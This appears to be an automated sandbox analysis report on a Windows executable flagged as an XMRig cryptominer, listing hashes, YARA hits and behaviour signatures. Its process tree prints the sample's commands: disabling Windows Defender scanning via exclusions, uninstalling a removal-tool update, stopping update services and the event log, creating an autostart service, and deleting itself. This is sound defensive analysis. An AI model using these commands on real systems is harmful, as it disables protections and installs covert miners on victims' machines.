Analysis
-
max time kernel
119s -
max time network
96s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
18-12-2024 11:53
Static task
static1
Behavioral task
behavioral1
Sample
a74a758a24bea635ad729a8e266bfe14417ef8aaea456d91a9ee34a258b8aafc.exe
Resource
win7-20240903-en
General
-
Target
a74a758a24bea635ad729a8e266bfe14417ef8aaea456d91a9ee34a258b8aafc.exe
-
Size
5.6MB
-
MD5
1374abeab8b6429353b41c2894d7b998
-
SHA1
104a05645fdda2f7bc400ea1e7ca8c21e25e0b25
-
SHA256
a74a758a24bea635ad729a8e266bfe14417ef8aaea456d91a9ee34a258b8aafc
-
SHA512
6b060ab3e562857400574adda51c10ecf092ad77e831b3e5e137ad6e56e790b79e066e4e42f8b17e618e01147ca0632d8f840a6bfca25c66f8d0f5fbaf07438c
-
SSDEEP
98304:xRjPz9KDzUU8O5/B/LJ25E9SVh86sS3TRknQ3ss2MApp9meypA3cPDu7C:xFKoU8O5/b2XViSjX310SeyGc7u7C
Malware Config
Signatures
-
Xmrig family
-
XMRig Miner payload 9 IoCs
resource yara_rule behavioral1/memory/2200-34-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2200-33-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2200-37-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2200-39-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2200-38-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2200-36-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2200-40-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2200-42-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2200-41-0x0000000140000000-0x0000000140848000-memory.dmp xmrig -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2748 powershell.exe 2924 powershell.exe -
Creates new service(s) 2 TTPs
-
Deletes itself 1 IoCs
pid Process 2320 cmd.exe -
Executes dropped EXE 2 IoCs
pid Process 476 Process not Found 2900 lutlgidagtja.exe -
Loads dropped DLL 1 IoCs
pid Process 476 Process not Found -
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 2504 powercfg.exe 1768 powercfg.exe 2380 powercfg.exe 1332 powercfg.exe 2072 powercfg.exe 2084 powercfg.exe 2212 powercfg.exe 1152 powercfg.exe -
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\system32\MRT.exe lutlgidagtja.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\MRT.exe a74a758a24bea635ad729a8e266bfe14417ef8aaea456d91a9ee34a258b8aafc.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 2900 set thread context of 2164 2900 lutlgidagtja.exe 85 PID 2900 set thread context of 2200 2900 lutlgidagtja.exe 89 -
resource yara_rule behavioral1/memory/2200-30-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2200-34-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2200-33-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2200-32-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2200-31-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2200-29-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2200-28-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2200-37-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2200-39-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2200-38-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2200-36-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2200-40-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2200-42-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2200-41-0x0000000140000000-0x0000000140848000-memory.dmp upx -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\wusa.lock wusa.exe File created C:\Windows\wusa.lock wusa.exe -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2080 sc.exe 2980 sc.exe 1068 sc.exe 2408 sc.exe 2600 sc.exe 976 sc.exe 2308 sc.exe 2728 sc.exe 2592 sc.exe 1772 sc.exe 2720 sc.exe 3052 sc.exe 2204 sc.exe 2816 sc.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 70ba27824351db01 powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2172 a74a758a24bea635ad729a8e266bfe14417ef8aaea456d91a9ee34a258b8aafc.exe 2748 powershell.exe 2172 a74a758a24bea635ad729a8e266bfe14417ef8aaea456d91a9ee34a258b8aafc.exe 2172 a74a758a24bea635ad729a8e266bfe14417ef8aaea456d91a9ee34a258b8aafc.exe 2172 a74a758a24bea635ad729a8e266bfe14417ef8aaea456d91a9ee34a258b8aafc.exe 2172 a74a758a24bea635ad729a8e266bfe14417ef8aaea456d91a9ee34a258b8aafc.exe 2172 a74a758a24bea635ad729a8e266bfe14417ef8aaea456d91a9ee34a258b8aafc.exe 2172 a74a758a24bea635ad729a8e266bfe14417ef8aaea456d91a9ee34a258b8aafc.exe 2172 a74a758a24bea635ad729a8e266bfe14417ef8aaea456d91a9ee34a258b8aafc.exe 2172 a74a758a24bea635ad729a8e266bfe14417ef8aaea456d91a9ee34a258b8aafc.exe 2172 a74a758a24bea635ad729a8e266bfe14417ef8aaea456d91a9ee34a258b8aafc.exe 2172 a74a758a24bea635ad729a8e266bfe14417ef8aaea456d91a9ee34a258b8aafc.exe 2172 a74a758a24bea635ad729a8e266bfe14417ef8aaea456d91a9ee34a258b8aafc.exe 2172 a74a758a24bea635ad729a8e266bfe14417ef8aaea456d91a9ee34a258b8aafc.exe 2172 a74a758a24bea635ad729a8e266bfe14417ef8aaea456d91a9ee34a258b8aafc.exe 2172 a74a758a24bea635ad729a8e266bfe14417ef8aaea456d91a9ee34a258b8aafc.exe 2172 a74a758a24bea635ad729a8e266bfe14417ef8aaea456d91a9ee34a258b8aafc.exe 2900 lutlgidagtja.exe 2924 powershell.exe 2900 lutlgidagtja.exe 2900 lutlgidagtja.exe 2900 lutlgidagtja.exe 2900 lutlgidagtja.exe 2900 lutlgidagtja.exe 2900 lutlgidagtja.exe 2900 lutlgidagtja.exe 2900 lutlgidagtja.exe 2900 lutlgidagtja.exe 2900 lutlgidagtja.exe 2900 lutlgidagtja.exe 2900 lutlgidagtja.exe 2200 nslookup.exe 2200 nslookup.exe 2200 nslookup.exe 2200 nslookup.exe 2200 nslookup.exe 2200 nslookup.exe 2200 nslookup.exe 2200 nslookup.exe 2200 nslookup.exe 2200 nslookup.exe 2200 nslookup.exe 2200 nslookup.exe 2200 nslookup.exe 2200 nslookup.exe 2200 nslookup.exe 2200 nslookup.exe 2200 nslookup.exe 2200 nslookup.exe 2200 nslookup.exe 2200 nslookup.exe 2200 nslookup.exe 2200 nslookup.exe 2200 nslookup.exe 2200 nslookup.exe 2200 nslookup.exe 2200 nslookup.exe 2200 nslookup.exe 2200 nslookup.exe 2200 nslookup.exe 2200 nslookup.exe 2200 nslookup.exe 2200 nslookup.exe 2200 nslookup.exe -
Suspicious use of AdjustPrivilegeToken 11 IoCs
description pid Process Token: SeDebugPrivilege 2748 powershell.exe Token: SeShutdownPrivilege 1332 powercfg.exe Token: SeShutdownPrivilege 2072 powercfg.exe Token: SeShutdownPrivilege 2084 powercfg.exe Token: SeShutdownPrivilege 2212 powercfg.exe Token: SeDebugPrivilege 2924 powershell.exe Token: SeShutdownPrivilege 2504 powercfg.exe Token: SeShutdownPrivilege 1768 powercfg.exe Token: SeShutdownPrivilege 2380 powercfg.exe Token: SeShutdownPrivilege 1152 powercfg.exe Token: SeLockMemoryPrivilege 2200 nslookup.exe -
Suspicious use of WriteProcessMemory 23 IoCs
description pid Process procid_target PID 2676 wrote to memory of 2556 2676 cmd.exe 38 PID 2676 wrote to memory of 2556 2676 cmd.exe 38 PID 2676 wrote to memory of 2556 2676 cmd.exe 38 PID 2320 wrote to memory of 2896 2320 cmd.exe 63 PID 2320 wrote to memory of 2896 2320 cmd.exe 63 PID 2320 wrote to memory of 2896 2320 cmd.exe 63 PID 2888 wrote to memory of 2376 2888 cmd.exe 71 PID 2888 wrote to memory of 2376 2888 cmd.exe 71 PID 2888 wrote to memory of 2376 2888 cmd.exe 71 PID 2900 wrote to memory of 2164 2900 lutlgidagtja.exe 85 PID 2900 wrote to memory of 2164 2900 lutlgidagtja.exe 85 PID 2900 wrote to memory of 2164 2900 lutlgidagtja.exe 85 PID 2900 wrote to memory of 2164 2900 lutlgidagtja.exe 85 PID 2900 wrote to memory of 2164 2900 lutlgidagtja.exe 85 PID 2900 wrote to memory of 2164 2900 lutlgidagtja.exe 85 PID 2900 wrote to memory of 2164 2900 lutlgidagtja.exe 85 PID 2900 wrote to memory of 2164 2900 lutlgidagtja.exe 85 PID 2900 wrote to memory of 2164 2900 lutlgidagtja.exe 85 PID 2900 wrote to memory of 2200 2900 lutlgidagtja.exe 89 PID 2900 wrote to memory of 2200 2900 lutlgidagtja.exe 89 PID 2900 wrote to memory of 2200 2900 lutlgidagtja.exe 89 PID 2900 wrote to memory of 2200 2900 lutlgidagtja.exe 89 PID 2900 wrote to memory of 2200 2900 lutlgidagtja.exe 89
Processes
-
C:\Users\Admin\AppData\Local\Temp\a74a758a24bea635ad729a8e266bfe14417ef8aaea456d91a9ee34a258b8aafc.exe"C:\Users\Admin\AppData\Local\Temp\a74a758a24bea635ad729a8e266bfe14417ef8aaea456d91a9ee34a258b8aafc.exe"1⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:2172 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2748
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵
- Suspicious use of WriteProcessMemory
PID:2676 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵
- Drops file in Windows directory
PID:2556
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:2720
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:2728
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:2592
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:3052
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:2080
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1332
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2072
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2084
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2212
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "JIOGRCSG"2⤵
- Launches sc.exe
PID:1772
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "JIOGRCSG" binpath= "C:\ProgramData\zvycwxhpsxqt\lutlgidagtja.exe" start= "auto"2⤵
- Launches sc.exe
PID:2980
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog2⤵
- Launches sc.exe
PID:1068
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "JIOGRCSG"2⤵
- Launches sc.exe
PID:2204
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\a74a758a24bea635ad729a8e266bfe14417ef8aaea456d91a9ee34a258b8aafc.exe"2⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:2320 -
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:2896
-
-
-
C:\ProgramData\zvycwxhpsxqt\lutlgidagtja.exeC:\ProgramData\zvycwxhpsxqt\lutlgidagtja.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2900 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2924
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵
- Suspicious use of WriteProcessMemory
PID:2888 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵
- Drops file in Windows directory
PID:2376
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:2816
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:2408
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:2600
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:976
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:2308
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1152
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2504
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1768
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2380
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:2164
-
-
C:\Windows\system32\nslookup.exenslookup.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2200
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5.6MB
MD51374abeab8b6429353b41c2894d7b998
SHA1104a05645fdda2f7bc400ea1e7ca8c21e25e0b25
SHA256a74a758a24bea635ad729a8e266bfe14417ef8aaea456d91a9ee34a258b8aafc
SHA5126b060ab3e562857400574adda51c10ecf092ad77e831b3e5e137ad6e56e790b79e066e4e42f8b17e618e01147ca0632d8f840a6bfca25c66f8d0f5fbaf07438c